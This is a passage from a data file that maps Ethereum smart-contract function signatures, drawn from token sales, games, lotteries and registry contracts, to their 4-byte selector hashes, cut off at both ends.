"0x9f2ccbcc", "claimFreeAnimalFromAnimalFactory(string,string)": "0x4ec1646d", "getAllAnimalsByAddress(address)": "0x9ab42287", "getOwnerByAnimalId(uint256)": "0xcfa517df", "getAnimalByIdVisibility(uint256)": "0x9b39f377", "getAnimalById(uint256)": "0xb974ddcb", "AnimalFactory(address,address)": "0x9ab3161d", "MemoLandCoin()": "0x7ea6c6ba", "UNOPEN(string,string,uint256,uint256,bool)": "0xc146eb02", "OPEN()": "0xd1b9c430", "betInStageAndReturnExcess(uint256,uint256)": "0x57381228", "Invent()": "0xcfbb4b24", "doMigration(address)": "0x953203b5", "finishIco(address,address)": "0x0657f3a1", "pauseIco()": "0xc4fdc6b8", "migrateSome(address[])": "0x2d29b29b", "foreignBuy(address,uint256,string)": "0x229ddd9a", "ICO(address,address,address)": "0x777b4547", "ATL(address)": "0xfc0dce74", "calculatePurchaseBonus(uint256,uint256)": "0xb3219d17", "processPurchase(address,address,uint256,uint256)": "0x78329d61", "buyUSD(address,uint256)": "0x0b2140ab", "getIcoInfo()": "0x8582ac21", "getRegisteredUser(address)": "0xe54a29bb", "getRegisteredUsers()": "0x7073c072", "vestingTransfer(address,address,uint256)": "0xa2db644e", "setLockedRatio(uint256)": "0x62a4b230", "setTimedCrowdsale(uint256,uint256)": "0x39637616", "isWhitelistedAddress(address)": "0x5fae0576", "safeDrain()": "0xe549ec26", "updateCommission(uint256)": "0x9d55fba7", "getTeamBet(string)": "0x34fa17cb", "getPlayersPick(string)": "0x189f0197", "getPlayerBet(string,address)": "0x457d13ca", "distributeWinnerPool(string,uint256)": "0x49b71e47", "UpdateBetOnTeams(string,address,uint256)": "0x055cdee1", "permitChildContract(address[])": "0x27f06a6e", "EtherWorldCup()": "0xbc5b75f4", "WorldCupTeam(address,string)": "0x4febb4f9", "getEthAmount(uint256)": "0x8fc7a25d", "refundTokens()": "0x71007509", "refundTokensForAddress(address)": "0x8aabe700", "_whitelistAddress(address)": "0x1b0cb61f", "_refundTokens(address)": "0xf522ec0e", "_deliverTokens(address)": "0xd180d0bc", "_getEthAmount(uint256)": "0x034de540", "_getCurrentRound()": "0x4702fa12", "XdacTokenCrowdsale(address,uint256[],uint256[],uint256)": "0x4e36fddf", "XdacToken()": "0xad8088a5", "getZodiac(uint256)": "0x0c9066dd", "ZodiacCore()": "0x760eab1a", "createDefaultZodiac(uint256,uint256,uint256,address,uint256,uint256)": "0x8899568c", "createDefaultGen0Zodiac(uint256,address,uint256,uint256,uint256)": "0x174b0093", "_createZodiacWithTime(uint256,uint256,uint256,uint256,address,uint256,uint256,uint256)": "0x045cc8ec", "_createZodiac(uint256,uint256,uint256,uint256,address,uint256)": "0xa114b5ae", "ContractFPC()": "0x3af8286f", "Viviox()": "0x955ff603", "BTK()": "0x386dd46e", "getGameByPlayer(address)": "0x225fce8d", "getGameById(uint256)": "0x09660513", "declareWinner(address,bool)": "0x23e5d13c", "joinGame(address)": "0x2389a290", "revertGame(address)": "0x468eeece", "cancelGame(address)": "0x5abb37d6", "createGame()": "0x7255d729", "togglePaused()": "0x36566f06", "setCGO(address)": "0x5e08f5fa", "switchSaleStage()": "0x279a34f1", "LockChain()": "0x6d5da09a", "collectDevFees()": "0x5054e8bf", "getDevFees()": "0x9017006e", "sellCoin(uint16)": "0xd4d2af8d", "payAndRemoveInvestor(uint16,uint256)": "0xb0773d12", "buyCoin(uint16)": "0x4c2db6d8", "isSenderInvestor(address,address[])": "0xf00d7326", "getUserCoinMarketValue(uint16,uint256)": "0x0c9a6c24", "getCoinInfoFromId(uint16)": "0xe9922f12", "getCoinIds()": "0x168b6231", "createCoin(uint16,string)": "0xad9657f4", "isCoinIdUnique(uint16)": "0x270d13fb", "getNewCoinFee()": "0xe079e334", "SDTToken()": "0x36ee1f2b", "setStatusBurn(bool,bool)": "0x3be52c2c", "setStatusBuySell(bool,bool)": "0x3f384026", "setStatusTransferFrom(bool)": "0x513611e5", "getStatusTransferFrom()": "0x9938579b", "getFreezeAccount(address)": "0x748de225", "FirstCryptoBank(uint256,string,string)": "0x72c537e6", "TOKENMOM()": "0x87699aa6", "MANHATTANPROXYACPBLVD()": "0x22798c10", "LudumToken(address,address,address,address)": "0xf93b4466", "ludumTokensPerEther()": "0x887c4f68", "HeliosToken()": "0x86a1ea7a", "revokeBountyTokens(address,uint256)": "0xba001de3", "assignBountyTokens(address,uint256)": "0xa626c3fe", "setBountyAgent(address,bool)": "0x0ba46624", "revokeTokens(address,uint256)": "0x721a37d2", "checkDeletable(address)": "0xbb4c006c", "calculateBalance(uint256,uint256)": "0xc2108a92", "upgradeTo(address,bytes)": "0x6fbc15e9", "purchaseTokensWithoutDevelopmentFund(uint256,address)": "0x95b890d6", "withdrawAffiliateRewards()": "0x614baf5c", "withdrawTotalDevEarned()": "0x6dc944f6", "getReferralBalance()": "0x4c330471", "getTotalDevelopmentFundEarned()": "0x73b14098", "getDevelopmentFundBalance()": "0x0a49dece", "getTotalComission(address)": "0x53819e85", "getSavedReferral(address)": "0x16af87a9", "reinvestAffiliate()": "0x12302932", "BitallexToken()": "0x93ac5048", "KANYE()": "0x5dc1c79d", "CIFRCOINTOKEN()": "0x25973ef7", "withdrawFundBeneficiary()": "0x2c6e4aea", "Presale(address,uint256,uint256,uint256,uint256,uint256,address,address)": "0x06e102a0", "FilmscoinToken()": "0x05cc72e3", "getInvestorsAddresses()": "0xb24bf695", "setReceiver3(address)": "0x674c5eaf", "ownerWithdraw(address,uint256)": "0xd9c88e14", "B0xPresale(address,address,address)": "0x12788f97", "MACHToken()": "0xe3ff9ac2", "Vag()": "0x2dd407f9", "owner_withdraw()": "0x34ef39f1", "Tokensale()": "0x99ec140d", "PowerLedger(address)": "0x90483aa1", "USACoin()": "0x53ce0a71", "Swanroll()": "0xde6764ba", "OpCoin()": "0x95cd73a2", "inflat(uint256)": "0xa2b1da51", "FeibeiContract()": "0x4d5d528a", "Ethershift()": "0x24e998c3", "BEAXY()": "0xbc15a2dd", "ROC()": "0x32bfdc38", "Technology5GCrowdsale(uint256,address,address)": "0x230434d2", "Technology5G(address)": "0xe45ab391", "ROSCtoken(uint256,string,string)": "0x1d6fe151", "Test5()": "0x6ee74b3c", "SaleTokens()": "0xc23e1cea", "IETToken(address)": "0x1d079c20", "IDXToken()": "0x2a729061", "updateSaleStageManually(uint256)": "0xef39fe35", "checkTimeBonusPercentage()": "0x600da23a", "calculateInstantBonusAmount(uint256,address)": "0xe8a21382", "participateICONow(address,uint256)": "0x160849a7", "participateICO(address,uint256)": "0xbfbf95cf", "participatePresaleNow()": "0xbe8cd7b8", "_buyTokensInCurrentStage(address,uint256,uint256)": "0x9a5e095c", "_initStages()": "0x8759afc9", "_setCrowdsaleStage(uint8)": "0x18c93884", "changeWhitelist(address)": "0x08d0a7cf", "FAFA(address)": "0x6fcfbe85", "BOLTH(address,address[],address)": "0xe04cd07c", "CloudbricSale(address,address)": "0x6ac47db5", "MindCoin()": "0x4d62a9da", "viewa2(address)": "0x56dfe628", "viewa1(address)": "0xbfe6c0c7", "removeAddressFromNonzeroBalancesArray(uint256,address)": "0xad4946ee", "chargeBuyer(uint256,address,uint256,uint256)": "0x4c37077f", "processSalesForAllBuyers(uint256)": "0x253abf4a", "processSalesForSingleBuyer(uint256,address)": "0x3729847b", "buyerExceededApprovedAmount(uint256,address)": "0x8eee1cd6", "approveAmountAndSetFirstUseTime(uint256,address,uint256,uint256)": "0x4797debe", "approveAmount(uint256,address,uint256)": "0xf44b43f8", "approvedAmount(uint256,address)": "0x88065236", "totalOwedForApi(uint256)": "0x6905877a", "amountOwedForApiForBuyer(uint256,address)": "0xcbd3faef", "nonzeroAddressesLengthForApi(uint256)": "0xa38b68cb", "nonzeroAddressesElementForApi(uint256,uint256)": "0x35e4d30f", "withdrawCredits(uint256)": "0x09ed1782", "addCredits(address)": "0xc216c0d3", "creditsBalanceOf(address)": "0xf9854bfc", "buyerInfoOf(address)": "0x44e2f9ad", "buyerLastPaidAt(uint256,address)": "0x1a0c83f8", "paySeller(uint256)": "0x68302467", "paySellerForBuyer(uint256,address)": "0x0ac5f441", "reportUsage(uint256,uint256,address)": "0x8f49ccf4", "setDefaultBuyerLastPaidAt(uint256)": "0x4ecc6eab", "setUsageReportingAddress(address)": "0x68aafcd9", "editApi(uint256,uint256,address,string)": "0x8a74b45c", "getApiByName(string)": "0xde13bec6", "getApiById(uint256)": "0xa0422d31", "getApiByIdWithoutDynamics(uint256)": "0x261ac279", "getApiId(string)": "0x07626adb", "listApi(uint256,bytes32,bytes32,string,string)": "0x31c0018b", "Start(string,bytes32)": "0x4f065672", "P2TCToken()": "0xa508ae0f", "getLotteryInfo(address)": "0x0ff4009c", "_lottery5(uint256,address,address)": "0x434ea7d3", "_lottery(uint256,address,address)": "0x27332624", "_lotteryToken(uint256,address,address)": "0x86aecb9d", "_lotteryCardNoSend(uint256)": "0x773b90db", "_lotteryCard(uint256,address)": "0x10d07e27", "lotteryByETH5(address)": "0x8b3049e1", "lotteryByETH(address)": "0xee280f89", "setNextLotteryTTWTokenId4(uint64)": "0xac2d7ce5", "setNextLotteryTTWTokenId3(uint64)": "0x88cac17d", "setNextLotteryTTMTokenId10(uint64)": "0x88064b07", "setNextLotteryTTMTokenId9(uint64)": "0x6af6b06f", "setNextLotteryTTMTokenId5(uint64)": "0x9c27ea08", "setNextLotteryTTMTokenId4(uint64)": "0x274a1f29", "setTalentCardAddress(address)": "0x52e60b90", "Alibabacoin()": "0x4021d93c", "BitcoinVision()": "0xd5064037", "LETSCOIN_Token()": "0xa293cba1", "Gov(uint256,string,uint8,string)": "0xb226ec29", "variationsOfOwner(address)": "0x04fd9f78", "templatesOfOwner(address)": "0x18507210", "mintCountByTemplate(uint256)": "0x380bf002", "mintLimitByTemplate(uint256)": "0xc2b477a7", "templateIdOf(uint256)": "0xdf84807a", "getTemplate(uint256)": "0x31543cf4", "setSaleAuction(address,address)": "0x5c3d6a7d", "mintCards(uint256[],address)": "0xab65f20a", "mintCard(uint256,address)": "0xe933cfb0", "mintTemplate(uint256,int256,uint256,uint256,uint256,string)": "0xd3a9187e", "setMintHelper(address,int256)": "0xe9959105", "setMiningLeader(address)": "0xabea8d79", "MNToken(uint256,string,uint8,string)": "0xfc632647", "nullifyFrom(address)": "0x3551a6ca", "returnFrom(address,uint256)": "0xc8e32074", "checkOrder(address)": "0x5fb1ef8e", "_checkOrder(address)": "0xc434650c", "cancelOrder(address)": "0x99c49852", "orderEthOf(address)": "0xf3868555", "orderTokensOf(address)": "0x1786e362", "SAToken()": "0xd2a3b190", "XXXXToken()": "0x1bc4d6b2", "orderBlockNumber(bytes32)": "0x89895d53", "orderConfirmer(bytes32)": "0x1107c3f7", "orderTrader(bytes32)": "0xb1a08010", "orderPriority(bytes32)": "0xb248e4e1", "orderMatch(bytes32)": "0xaf3e8a40", "orderState(bytes32)": "0xaab14d04", "confirmOrder(bytes32,bytes32)": "0x2a0401f0", "openOrder(uint64,bytes,bytes32)": "0xa1ce7e03", "addr(bytes,bytes)": "0x7e3dbf96", "deregisterSettlement(uint64)": "0x06b82a7d", "brokerVerifierContract(uint64)": "0xa6065c96", "settlementContract(uint64)": "0x3809b240", "settlementRegistration(uint64)": "0xf8f9be36", "orderStatus(bytes32)": "0x2dff692d", "settle(bytes32,bytes32)": "0xd32a9cd9", "submissionGasPriceLimit()": "0x4c3052de", "submitOrder(bytes,uint64,uint64,uint256,uint256,uint256)": "0xb86f602c", "verifyOpenSignature(address,bytes,bytes32)": "0x472e1910", "getDarknodesFromEpochs(address,uint256,bool)": "0xe01ea00c", "isRegisteredInPreviousEpoch(address)": "0x7be266da", "isRefundable(address)": "0x5aebd1cb", "isRefunded(address)": "0xffc9152e", "isDeregisterable(address)": "0xe1878925", "isDeregistered(address)": "0x8020fc1f", "isPendingDeregistration(address)": "0x303ee989", "isPendingRegistration(address)": "0x040fa051", "getPreviousDarknodes(address,uint256)": "0x43846074", "getDarknodes(address,uint256)": "0xec5325c1", "getDarknodePublicKey(address)": "0x84d2688c", "getDarknodeBond(address)": "0xba0f5b20", "getDarknodeOwner(address)": "0x1cedf8a3", "slash(address,address,address)": "0x563bf264", "updateSlasher(address)": "0xb3139d38", "updateMinimumEpochInterval(uint256)": "0x63b851b9", "updateMinimumPodSize(uint256)": "0x80a0c461", "updateMinimumBond(uint256)": "0x0ff9aafe", "transferStoreOwnership(address)": "0xc2250a99", "register(address,bytes,uint256)": "0x0aeb6b40", "darknodePublicKey(address)": "0xee594a50", "darknodeDeregisteredAt(address)": "0x01930b6e", "darknodeRegisteredAt(address)": "0xe2d7c64c", "darknodeBond(address)": "0xcad41357", "darknodeOwner(address)": "0xa3078815", "updateDarknodeDeregisteredAt(address,uint256)": "0x3ac39d4b", "updateDarknodeBond(address,uint256)": "0xfbc402fc", "removeDarknode(address)": "0x41b44392", "appendDarknode(address,address,uint256,bytes,uint256,uint256)": "0xa85ef579", "mintDRSCoin(address,uint256)": "0x15b0821f", "getEthPerfit(address)": "0x2bf4760b", "gameCountdown(address)": "0xf16b6482", "deleteGame(address)": "0x8406ab82", "proposeGame(address)": "0x8284f2a7", "getMintAmount(uint256)": "0x9de2f796", "nextReduceSupply()": "0xf45ef033", "getUnpaidPerfit(uint32,uint32,uint256)": "0x41b5467a", "getCurrentMonth()": "0xddd1b67e", "settleEth(address,uint32,uint32)": "0x04532035", "parseTimestampToYM(uint256)": "0xab18f6ac", "withdrawDai(uint256)": "0x93a991af", "SUV()": "0xa2ad360f", "getMiningWarPlayerData(address)": "0xaa2b5d7d", "randomNumber(address,uint256)": "0xc0d26946", "distributedToOwner(uint256)": "0x77838c63", "calCurrentCrystals(address)": "0x95360a02", "addMiningWarPrizePool(uint256)": "0xcd6fc2d1", "addPrizePool(uint256)": "0x5b7ca9c6", "getResearchPerDay(address)": "0x2326faf9", "updateResearch(address,uint256)": "0xf1694b3d", "resetPlayer(address)": "0xc95e0909", "calculateCurrentVirus(address)": "0x207a6c33", "updateVirus(address)": "0x3b9e1497", "buyEngineer(uint256[])": "0x4b9c78e5", "endAttack(address,address,bool,uint256,uint256,uint256,uint256)": "0x499cd176", "canAttack(address,address)": "0x5166cf3d", "attack(address,uint256)": "0x52fba25c", "addVirusDefence(uint256)": "0x58eafc37", "setVirusInfo(uint256,uint256)": "0x4bbb58b2", "claimPrizePool(address,uint256)": "0x7baf71f9", "addTimeUnequalledDefence(address,uint256)": "0xf0af0844", "setAtkNowForPlayer(address)": "0x7f3e4d1b", "subVirus(address,uint256)": "0x920775d4", "addVirus(address,uint256)": "0xec6f772d", "becomeGameSponsor()": "0xda4a76c0", "APTV()": "0x65f42e7a", "CherishToken()": "0x763e29ad", "TechZU()": "0x169b15fa", "setDIDTokenAddress(address)": "0xcf2fb7ca", "updateLastVotedOnParameter(bytes32,address)": "0x77a9037b", "updateParameterValue(bytes32,uint256)": "0xb2c26f94", "getNumParameters()": "0x33360632", "getParameterByTitle(bytes32)": "0xc8f3e5f0", "voteOnParameter(bytes32,int256)": "0x18946e8f", "getParameterValueByTitle(bytes32)": "0x8fc6ad2d", "setDistenseAddress(address)": "0x2a4caf67", "deleteDIDHolder(address)": "0xc621f96e", "deleteDIDHolderWhenBalanceZero(address)": "0xe43ae642", "calculateNumWeiToIssue(uint256,uint256)": "0x11c09100", "calculateNumDIDToIssue(uint256,uint256)": "0xf6774660", "getWeiInvested(address,address)": "0xf6fbc06a", "getNumContributionsDID(address,address)": "0x1282cc2a", "charityFactor()": "0x5f5f23a0", "CRLperMicroEther()": "0x70cd89eb", "judgeAddress()": "0x3c03d8be", "receiverOne()": "0xc1b07b1a", "bhCheck()": "0x54a28ded", "hashRegistrar()": "0x387c0cb4", "privateSell1Token()": "0x787c17d9", "partPos()": "0xf764e8a0", "updateInterval()": "0xfd2c80ae", "jack_winner()": "0xe5700ddf", "queryType()": "0x633f7a82", "allowedRefund()": "0x5267bd0c", "upgradeableTarget()": "0x40fc5e7a", "XVOTOKEN()": "0xc7d5c0af", "cancelSell()": "0x7f008a0a", "tokensApproved()": "0x2b99db6a", "issuedInsurance()": "0x402e912f", "openForPublic()": "0xeff3c4e7", "STAT_COUNT()": "0xd98e14bd", "MAX_TRANCHES()": "0x89506a44", "GetBank()": "0x15f78c0c", "stake()": "0x3a4b66f1", "tokenlength()": "0x651bb617", "getAnnualFee()": "0xcca746df", "hell()": "0xc134bc92", "computed_fundraise()": "0x0bd7b6b8", "decentBetMultisig()": "0x9a45a263", "TimeWeekTwo()": "0x213ad495", "bonusAllocation()": "0x016211b5", "m_owner20()": "0x834b1aa1", "ethToBeDistributed()": "0xdc502d64", "ante()": "0xe3f2e4a4", "FileHashInt()": "0x7e6c945c", "fetchRate()": "0x63055d79", "bonusTicketsPercentage()": "0x5bba11bd", "manaPerEth()": "0xe160a1d6", "advisersAllocation()": "0x660ef82d", "closeSell()": "0xba83c970", "preICOLimit()": "0xea60e79b", "phase_4_remaining_tokens()": "0x1542b365", "lastPlayerPaid()": "0x18469491", "VZT_WALLET()": "0x1342c0e8", "userSignupCount()": "0x0f5ee138", "presaleHardcap()": "0xcba25e79", "Start10()": "0xd39b0cbb", "IcoCap()": "0x7b012ff6", "holdTime()": "0x097d5155", "depositWallet()": "0x09904c00", "sellTokenPerEther()": "0xbd95d909", "hugeContributionBound()": "0x7bb7adb6", "BONUS_LEVEL_3()": "0xa3435da5", "thirdStartTime()": "0x067c2d78", "setDelegatedFromOperation()": "0xf897ebbc", "endPreSaleStage()": "0xcc5530eb", "FAPFounderFund()": "0x498be109", "foundationHashed()": "0x89a4bd1b", "resetData()": "0x478c4e0e", "icoStartP2()": "0x617a2a15", "vestingTime()": "0xc7dab436", "subFundAccount()": "0x877af5b4", "tokenCreationRate()": "0xcf8d652c", "Static()": "0x31b8b100", "publicTransfersEnabled()": "0x845d586f", "minCount()": "0x0693b1ab", "priceWithBonus()": "0xfc3880ae", "founderMembers()": "0x287b020b", "winnerAnnounced()": "0xee174697", "finishEthGetToken()": "0xd1b6a51f", "ZethrBankroll()": "0xa948d72d", "firstBonus()": "0x127e499c", "burnedAfterSaleCount()": "0xce8e5170", "makeMoveBro()": "0x92f926e5", "getPreICOLength()": "0x60a4d599", "restTokens()": "0xafd9897e", "tokenAdmin()": "0xb7e1917c", "countRemaining()": "0x60f75530", "stage4BeginTime()": "0x50fa5d13", "verifyUrl()": "0x23b6fc8b", "wholeTokensPerEth()": "0x4e15dfe9", "bonusByAmount()": "0x8d0a3b6d", "ownerOne()": "0xf0664a4f", "fundersClaimed()": "0xb393fa46", "ticker()": "0x8ba47bdd", "silverBoxPrice()": "0xc6180d27", "SECOND_TIER_RATE()": "0xf9319a88", "numberOfBoardMeetings()": "0x62040de3", "buyEthereumToken()": "0x983485e1", "tranchePeriodInDays()": "0x69776b1b", "COMBINED_WEI_GOAL()": "0x840dea74", "myData()": "0x2bb14104", "periodLimit()": "0xcf763d1c", "sealer()": "0x2aea4d21", "fund_()": "0xaabda436", "totalPresaleTokensYetToAllocate()": "0x2eee5a3e", "crowdsale_eth_fund()": "0x878314c9", "referralRateInvitee()": "0xdedeb3ca", "affiliatThreshold1()": "0xcd854072", "bet_MAX()": "0xe3206975", "redeemBool()": "0x44ab6970", "mintFeeFlat()": "0xd63a1389", "_getCurrentBonus()": "0x5fe78b9b", "timelock(address,uint256)": "0xaa628c31", "unlockTransfers()": "0x21842be3", "SintToken(uint256)": "0xe2e267fc", "makeComment(string)": "0x69318a79", "KUYOOToken()": "0x87a04b67", "IREC()": "0x17993e2f", "SGD()": "0x2e79477f", "EQUIEX()": "0x1d836ae9", "getOwnerName(address)": "0xbedefffe", "setOwnerName(address,string)": "0x413699de", "CryptoMilitary()": "0x48e252ab", "TianqibaoTokenERC20(uint256,string,string)": "0xce71b83c", "WizardsvsCeltics()": "0x627c2516", "getGameFees(uint256)": "0xf95547fa", "setJoinDelta(uint256)": "0x7adee0e3", "setMinWager(uint256)": "0x9ae980a8", "toggleCanCreateGames()": "0x5ed570f3", "scam()": "0x3d8a63e4", "ProofOfSecret()": "0x6179ed72", "Indemnisation_5()": "0xc5cc52fc", "Indemnisation_4()": "0x86a2ef34", "Indemnisation_3()": "0xf0ca618e", "Indemnisation_2()": "0xab045871", "Indemnisation_1()": "0x2a1c70e7", "getOuverture_effective()": "0xadff2450", "setOuverture_effective(uint256)": "0xbe66399f", "getOuverture_des_droits()": "0x188a1d68", "setOuverture_des_droits(uint256)": "0x47255591", "getRealisation_effective()": "0xcf2b8c05", "setRealisation_effective(uint256)": "0xe8227611", "getRealisation()": "0x4e6106c5", "setRealisation(uint256)": "0x2955d4ce", "getSinistre_effectif()": "0xfba5ee24", "setSinistre_effectif(uint256)": "0x5ff7f947", "getSinistre()": "0x7d00848a", "setSinistre(uint256)": "0x5a1024d5", "BIMI_DAO_31()": "0xb4a4136d", "SEKEM()": "0xcee6f794", "MANHATTANPROXYEASTENDAVE()": "0x9061da22", "MeissaChallengeToken()": "0xbd633642", "backProjectXOwner()": "0x3b2fd34d", "ProjectX()": "0x69732d4b", "MANHATTANPROXY12THAVE()": "0x6a33440a", "Phoenixcurrency()": "0x8b0980d9", "revive(uint256)": "0x8baecc21", "changeGenerator(address)": "0x74e5b122", "checkCode(string)": "0x9ec40d1c", "deleteOrg(string)": "0xa1155286", "addOrg(string)": "0xf9953de5", "setItem(uint8,uint8,uint256)": "0xf4d24fea", "buyItem(uint8,uint8,uint256,uint256)": "0xa3d4e4b5", "MagicStore(address)": "0x1a6c6e38", "MassivelyMultiplayerOnlineGameToken()": "0x586a94ba", "validAmount()": "0x73930ce2", "vanilAddress()": "0x12e7b2ba", "ETH888CrowdsaleS2(address,address)": "0x898366d7", "changeVuePayETHDestinationAddress(address)": "0xde0a1c5d", "createCustomVUP(address,uint256)": "0xa0a1082a", "getCurrentVUPRate()": "0xf51d4cb1", "VuePayTokenSale()": "0xfb31b262", "isSellingNow()": "0x86323e85", "returnETHforUnqualifiedBuyers(uint256,uint256)": "0xe44f777c", "deliveryToken(uint256,uint256)": "0xa8a6e9df", "getAllBuyers()": "0x86cba22b", "getNormalBuyers()": "0xe0495a64", "getInvestorBuyers()": "0xad7f9d76", "filterBuyers(bool)": "0x96d1c952", "setMinimumBuy(uint256)": "0x731f03fc", "Spike()": "0x85add95b", "buySpike()": "0x38116187", "setPreICOSoldAmount(uint256,uint256)": "0xd702e364", "transferToContractWithCustomFallback(address,uint256,bytes,string)": "0x52fbeb57", "_processBonus(address,uint256)": "0x9ee60142", "Crypto()": "0x620b5cd2", "MichaelCoin()": "0x21289506", "DrAgentToken()": "0x34f8cc6d", "WonderDogToken(uint256,string,uint8,string)": "0xea454da8", "transferFromOwner(address,address,uint256,uint256)": "0x391c918e", "tokenTransferOwnership(address)": "0x0dc081c5", "startBlock(address)": "0x3f697ce9", "TokenSale(uint256,uint256,uint256,uint256,address,uint256,uint256,address)": "0xd199c81d", "initialPokemonInfo()": "0x0ea81cf9", "getPokemonCD(uint256)": "0x10523af3", "getPokemonBetTimes(uint256)": "0xf93f1391", "getPublicBattlePokemon2()": "0x5afbfd4f", "getPublicBattlePokemon1()": "0x7e92a7e8", "getPokemonBet(uint256)": "0x10ebf103", "totalBattles()": "0xbf1dfb8a", "addPokemonDetails(string,uint256,uint256)": "0x6bbadf09", "getBattleDetails(uint256)": "0xf0e26f80", "dataCalc(uint256,uint256)": "0x4702d115", "startpublicBattle(uint256,uint256)": "0x6357cc12", "guess(uint256)": "0x9189fec1", "donateToPool()": "0x8bbe4719", "initialBattle(uint256,uint256)": "0x88e2af0e", "PublicBattle()": "0xf3873e7b", "levels(uint256)": "0xb2596a67", "preFixed(address,uint256)": "0xf44376a2", "MoneyTokenPromo(uint256,string,uint8,string)": "0xc752a999", "fund(bytes32)": "0xbf14c119", "getOwnedTokenIds()": "0xb0d8b51f", "getMountTokenIds(uint256,address)": "0xf4ffa7a9", "updateAvatarInfo(uint256,string,uint256)": "0xa59799e6", "injectAvatarService(address)": "0x43bd262e", "setMaxAvatarNumber(uint8)": "0xe8ff269e", "removeAllOps()": "0xbc14016b", "getOwnedTokenIds(address)": "0x4fac7e41", "getAvatarInfo(uint256)": "0x43a92f24", "getMountTokenIds(address,uint256,address)": "0x911cec25", "createAvatar(address,string,uint256)": "0xc1f8056b", "updateAvatarInfo(address,uint256,string,uint256)": "0x2de541e0", "Dain()": "0x67b40639", "random(bytes32,uint32)": "0x375c21b0", "f1(address)": "0x2dc8b9de", "collectAirDropTokenBack(uint256)": "0xe2edfc20", "transferAnyERC20TokenToBeneficiary(address,address,uint256)": "0xac979688", "ownerRecoverTokens(address,address)": "0xf07a019d", "swapTokenValueForCredits(address,address,uint256,address,string,uint256,uint8,address)": "0xe451ecfa", "setWhitelisted(address,address,bool)": "0xa97a6d63", "withdrawAll(uint256,address)": "0x4c2233a5", "canDeposit(uint256)": "0x39443b8e", "finalizeTime()": "0x6a03eaf9", "queryRandomCallback(bytes32,string,bytes)": "0xe39fa059", "queryRandom()": "0xd5246eba", "getQueryRandomCallbackGas()": "0xd79941d8", "getGasPrice(string)": "0xb2a1a022", "ReddyToken()": "0x9da065cb", "GeneralToken(string,string,uint8)": "0xbcc673bd", "FakeXUC()": "0x4e023fc9", "LoveYToken(uint256,string,uint8,string)": "0x26d83db8", "MyFreeCoin112(uint256,string,uint8,string)": "0xe32754a0", "sendSalary(address)": "0x3c9266e0", "transferLog(address,address)": "0x10361bf2", "depositInvestment()": "0x661956fb", "listOutEmployees()": "0xe53cacba", "updateSalary(address,address,uint256)": "0x909862b7", "removeEmployee(address,address)": "0x9f70db12", "payrollSystem()": "0x68a958bc", "uddr()": "0x63a999cc", "AshenVoid()": "0x0069a132", "SKRToken()": "0x16534bfc", "WinEToken()": "0xa2ad16ed", "getPenndingBalances()": "0x6b5e7b06", "getAllSponsors()": "0x9b5f8abb", "sharesOfSPS()": "0x9d433c71", "getWinResults(uint256)": "0xd0569bc8", "getWinners(uint256)": "0x6b1426a4", "getPlayerGuessNumbers()": "0x89233fbd", "guess(uint256[])": "0x68da5ee5", "getTargetBNumber()": "0x554e6c61", "setOdds(uint256)": "0xa6809af0", "pauseGame(bool)": "0x4f53126a", "addresstoBytes(address)": "0xfee87e3b", "inArray(address[],address)": "0x3f045e61", "inArray(uint256[],uint256)": "0xbbd95c32", "ethselfToken()": "0xaeda10be", "calculateWeeklyTokensSupply()": "0x6e965a89", "mintForWebsites(address[],uint256[])": "0x215ae66d", "getWeeklyTokensForWebsitesAmount()": "0xd33d1aac", "mintForHolders(address[],uint256[])": "0x523e57be", "getWeeklyTokensForHoldersAmount()": "0x9801ca60", "mintForFounders()": "0x2bf5a2ea", "mintOneWeek()": "0xc6361267", "getFirstBorrowAgreement(address,address)": "0x1b13756a", "BitCoix()": "0xa6aba1b5", "sendTeamTokens(address)": "0xeb64922b", "sendLiquidityFund(address,uint256)": "0xcf1f335e", "sendIncentivisation(address,uint256)": "0x9f204a47", "sendAdvisory(address,uint256)": "0xd97b14f0", "sendReferral(address,uint256)": "0x74d53cc2", "sendTokensSale(address,uint256)": "0xbe4a0910", "setColorMetadata(uint256,string)": "0xfd77905c", "setColor(uint256,string)": "0xa44b6b74", "addColor(string,string)": "0x9cb6a504", "ETCH3dV()": "0x9cf21d90", "FCOIN1050Token(uint256,string,string,uint256)": "0x38bbfc51", "testNBool()": "0xce3099fa", "testYBool()": "0xdf63d908", "Netyul(uint256,string,string)": "0xbedf8e75", "burnTokens(uint256,address)": "0x9730b305", "createTokens(uint256,address)": "0xd2c73093", "USD20Crowdsale()": "0xe536a41f", "D3JDemo(uint256,string,uint8,string)": "0xf03c0e8f", "YICHAINCoin()": "0x491e74f3", "Cooperium()": "0x39009094", "createTokenUri(uint8,uint8,uint64,uint64,uint64)": "0x0d2fc226", "create(uint8,uint8,uint64,uint64,uint64)": "0x1664b9cf", "processReward()": "0x55b8415e", "prepareToRewardProcess()": "0x441478c3", "YYToken(uint256,string,uint8,string)": "0x87bf740b", "MargamCoin()": "0xb09c235e", "MDIToken()": "0xf4399f2d", "FCOIN1110Token(uint256,string,string,uint256)": "0x42ca2fe3", "startnewround()": "0x9d41198e", "takeoffer(uint256,uint256)": "0xaa657815", "offerchangeprice(uint256,uint256)": "0x15bd73f1", "removedotchtooffer(uint256,uint256)": "0xb0e16cce", "adddotchtooffer(uint256,uint256)": "0xe84a481b", "placeoffer(uint256,uint256)": "0x50849c3b", "PalaceResidence()": "0x1e60ab84", "withdrawalTimeOf(address)": "0xdb246fda", "DarenHui()": "0xdc81e2b8", "SNL()": "0x23a9a156", "returnReclaimed(uint256,address)": "0x77bbc957", "returnAmountPledged(uint256,address)": "0xba8af655", "returnCreator(uint256)": "0x77b7b5f3", "returnTokenAddress(uint256)": "0xb995ce4d", "returnHost(uint256)": "0x10319417", "returnAmountRaisedSoFar(uint256)": "0xec85d464", "returnStatus(uint256)": "0xe661b3d5", "returnStartTime(uint256)": "0x2ec9322d", "returnDuration(uint256)": "0x682a5e89", "returnHostCut(uint256)": "0x82233b7a", "returnMaxGoal(uint256)": "0x81e6c686", "returnMinGoal(uint256)": "0xd0995198", "pledgeTokens(uint256,uint256)": "0xee0fdd0f", "redistributeTokensForAddresses(uint256,address[])": "0x499ac979", "distributeSuccessfulCampaignFunds(uint256)": "0x96ebabba", "maxGoalReached(uint256)": "0x60cc2e8c", "acceptProposal(uint256,address)": "0xbc56e749", "rejectProposalAsHost(uint256)": "0xb73fefe8", "cancelProposalByCreator(uint256)": "0x9fb3d489", "setNewCreator(address,uint256)": "0x9aacb10a", "makeProposal(string,uint256,uint256,uint256,uint256,address,address)": "0xc43148ca", "crowdfund()": "0x8342a9d9", "getZombiesFullInfoByOwner(address)": 